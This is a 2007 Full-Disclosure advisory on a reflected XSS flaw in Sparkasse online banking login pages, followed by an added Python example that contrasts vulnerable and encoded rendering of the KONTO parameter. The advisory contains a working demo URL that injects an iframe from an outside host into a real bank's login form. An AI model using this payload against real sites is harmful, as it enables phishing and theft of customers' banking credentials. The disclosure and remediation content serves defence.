Message-ID: <464BD542.3030204@der-keiler.de>
Date: Thu, 17 May 2007 06:08:34 +0200
From: Ulrich Keil <full-disclosure@...-keiler.de>
To: full-disclosure@...ts.grok.org.uk
Subject: XSS vulnerability on various german online banking sites (sparkasse)

The "Sparkassen-Finanzgruppe" with a transaction volume of over 3.300 
billion euro is one of the largest banks for private customers in 
Germany. Many local member banks of the group use the online banking 
portal provided by sfze (http://www.sfze.de/), a subsidiary company of 
Sparkassen-Finanzgruppe.

Vulnerability:
The online banking software of sfze does not check the HTTP GET 
parameter "KONTO" on the login page, and displays the content of this 
variable without modification within the HTML form area.

Impact:
An attacker may gather login data (ID+PIN) from customers of the 
Sparkassen-Finanzgruppe by tricking them into clicking on a specially crafted 
link, which points to the original login page of the online banking system.

Demonstration:
The following trivial example demonstrates the impact of this 
vulnerability by extending the login form with an iframe:
https://bankingportal.sparkasse-donnersberg.de/banking/?BLZ=54051990&Bankingaufruf.x=0&Bankingaufruf.y=0&KONTO=%22%20/%3E%3Ciframe%20src=%22http://www.derkeiler.com/uk/sp.html%22%20scrolling=%22no%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22width=%22310px%22

Some subsidiary companies of Sparkassen-Finanzgruppe which are affected 
by this vulnerability:
- Sparkasse Donnersberg
- Sparkasse Ludwigshafen
- Sparkasse KölnBonn
- Sparkasse Aachen
- Frankfurter Sparkasse
- Sparkasse Rhein Neckar Nord

Ulrich Keil
-- 
http://www.derkeiler.com
PGP Fingerprint: 5FA4 4C01 8D92 A906 E831  CAF1 3F51 8F47 1233 9AAD
Public key available at http://www.derkeiler.com/uk/pgp-key.asc

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
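The defect described in the advisory is a reflected XSS in HTML attribute context: the KONTO query parameter is written into the value attribute of the login form without encoding, so a leading quote closes the attribute and the rest of the parameter becomes markup. The following added example (not code from the advisory or from sfze) extracts KONTO from the demo URL quoted above, renders the form both the vulnerable way and with attribute-context encoding, and parses the result to show that the encoded version keeps the parameter inside the attribute. The form markup and the digits-only allowlist for KONTO are assumptions made for the example.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Demo URL quoted in the advisory; KONTO carries the injected markup.
DEMO_URL = ("https://bankingportal.sparkasse-donnersberg.de/banking/?BLZ=54051990"
            "&Bankingaufruf.x=0&Bankingaufruf.y=0&KONTO=%22%20/%3E%3Ciframe%20src=%22"
            "http://www.derkeiler.com/uk/sp.html%22%20scrolling=%22no%22%20marginheight="
            "%220%22%20marginwidth=%220%22%20frameborder=%220%22width=%22310px%22")

# Assumption: an account number is 1..10 digits; anything else is rejected up front.
KONTO_RE = re.compile(r"^[0-9]{1,10}$")

def konto_from_url(url):
    """Return the percent-decoded KONTO query parameter ('' if absent)."""
    return parse_qs(urlsplit(url).query).get("KONTO", [""])[0]

def is_valid_konto(konto):
    """Allowlist check on the input; the encoding below is still required."""
    return KONTO_RE.fullmatch(konto) is not None

def render_vulnerable(konto):
    """Reflects KONTO verbatim into the value attribute (the behaviour reported above)."""
    return f'<form><input type="text" name="KONTO" value="{konto}" /></form>'

def render_fixed(konto):
    """Same form, but KONTO is encoded for attribute context (quote=True also escapes ")."""
    safe = html.escape(konto, quote=True)
    return f'<form><input type="text" name="KONTO" value="{safe}" /></form>'

class TagCollector(HTMLParser):
    """Records every start tag and the value attribute of each <input>."""
    def __init__(self):
        super().__init__()
        self.tags, self.values = [], []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.values.append(dict(attrs).get("value"))

def parse_tags(markup):
    """Return (start tags in order, input value attributes) for the rendered form."""
    p = TagCollector()
    p.feed(markup)
    return p.tags, p.values
```

With the vulnerable renderer the parser sees an extra iframe start tag; with the fixed renderer the only tags are form and input, and the input's value attribute decodes back to the original KONTO string.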
